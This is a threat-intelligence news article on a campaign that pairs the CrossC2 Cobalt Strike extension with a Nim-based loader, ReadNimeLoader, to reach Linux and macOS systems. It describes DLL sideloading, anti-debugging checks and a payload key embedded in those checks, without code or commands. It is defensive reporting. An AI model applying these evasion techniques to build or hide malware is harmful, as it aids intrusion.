A sophisticated threat campaign has emerged that leverages CrossC2, an unofficial extension tool that expands Cobalt Strike’s notorious capabilities beyond Windows systems to target Linux and macOS environments.
Between September and December 2024, cybersecurity incidents involving this cross-platform malware have been documented, representing a significant evolution in threat actor tactics that traditionally focused on Windows-based infrastructure.
The attack campaign demonstrates remarkable technical sophistication, employing a multi-stage infection chain that begins with legitimate system processes and progressively deploys more malicious components.
Attackers utilized a combination of established tools including PsExec, Plink, and traditional Cobalt Strike alongside the novel CrossC2 extension, creating a comprehensive assault framework capable of penetrating Active Directory environments across multiple operating systems.
The campaign’s reach extends beyond Japan, with evidence suggesting similar activities across multiple countries based on submissions to VirusTotal.
JPCert analysts identified that the threat actors deployed custom malware dubbed “ReadNimeLoader,” which serves as a sophisticated loader specifically designed to execute Cobalt Strike payloads.
This loader, written in the Nim programming language, demonstrates advanced anti-analysis techniques and represents a significant departure from conventional malware deployment methods.
.webp "Threat Actors Using CrossC2 Tool to Expand Cobalt Strike to Operate on Linux and macOS 3")
The researchers noted that the malware chain involves legitimate java.exe processes executing through scheduled tasks, which subsequently load malicious DLL files through DLL sideloading techniques.
Advanced Anti-Analysis Mechanisms
The ReadNimeLoader component incorporates four distinct anti-debugging techniques that significantly complicate malware analysis efforts.
These mechanisms include monitoring the BeingDebugged value in the Process Environment Block (PEB), checking for CONTEXT_DEBUG_REGISTER values, measuring elapsed time differentials, and implementing exception-based debugging detection.
Particularly noteworthy is the malware’s key generation process, where portions of the decryption key required for payload activation are embedded within the anti-analysis functions themselves.
This architectural decision ensures that unless these protective functions execute properly, the correct decryption key cannot be generated, effectively preventing static analysis of the payload.
The decryption process utilizes AES256-ECB mode encryption, with keys generated through a sophisticated process involving string decoding functions.
The malware employs two distinct XOR-based decoding mechanisms, with later versions incorporating an additional decode02 function, indicating ongoing development and refinement by the threat actors.
Cross-platform expansion of traditionally Windows-focused malware represents a concerning trend, particularly as many Linux servers lack comprehensive endpoint detection and response systems, potentially providing attackers with extended dwell time and expanded lateral movement opportunities within compromised networks.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
